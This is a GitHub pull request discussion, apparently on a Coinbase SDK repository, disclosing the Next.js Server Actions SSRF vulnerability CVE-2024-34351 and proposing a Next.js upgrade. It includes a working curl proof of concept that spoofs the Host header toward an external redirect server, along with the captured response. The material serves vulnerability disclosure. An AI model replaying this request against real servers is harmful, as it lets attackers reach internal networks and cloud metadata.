fix(deps): Server-Side Request Forgery in Next Actions DApp

[lamcodeofpwnosec]

Summary

server has vulnerable redirect action. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next Coinbase SDK Server Actions. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. An attacker is able to read the full HTTP response when successfully exploiting this SSRF issue.

 export async function create() { 
   console.log('Server Side') 
   return redirect("/?voorivex"); 
 } 

Attacker need to prepare a redirect sever for sniffing, is prepared for this PoC.

curl 'http://localhost:3000/' \
  -H 'Host: nextjs-cve-2024-34351.deno.dev' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://localhost:3005/connect' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://localhost:3005/connect' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw '[]'

<!doctype html>
<html>
<head>
    <title>Coinbase SDK</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;

    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>
</head>

<body>
<div>
    <h1>Example Domain</h1>
    <p>This domain is for use in illustrative examples in documents. You may use this
    domain in literature without prior coordination or asking for permission.</p>
    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>

Impact

An attacker can make arbitrary requests to URLs and read the full HTTP response made through these requests. As the requests originate from the server, an attacker could leverage this bug to access the internal network or metadata IPs for privilege escalation. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next application server itself.
CWE-918
CVE-2024-34351

Solution

Upgrade Next 14.1.1.

[cb-heimdall]

🟡 Heimdall Review Status

Requirement	Status	More Info
Reviews	🟡 0/1	Denominator calculation Show calculation 1 if user is bot 0 1 if user is external 0 From .codeflow.yml 1 Additional review requirements Show calculation Max 0 0 From CODEOWNERS 0 Global minimum 0 Max 1 1 1 if commit is unverified 0 Sum 1

[cb-jake]

Thanks for flagging. Next is just for testing the SDK. Will look into upgrading in a future PR.

[lamcodeofpwnosec]

Hi @cb-jake Thank's for your respond. lets merged this pull-request for fix that

[cb-jake]

Thanks. Going to close. We have an existing PR to update next here #1429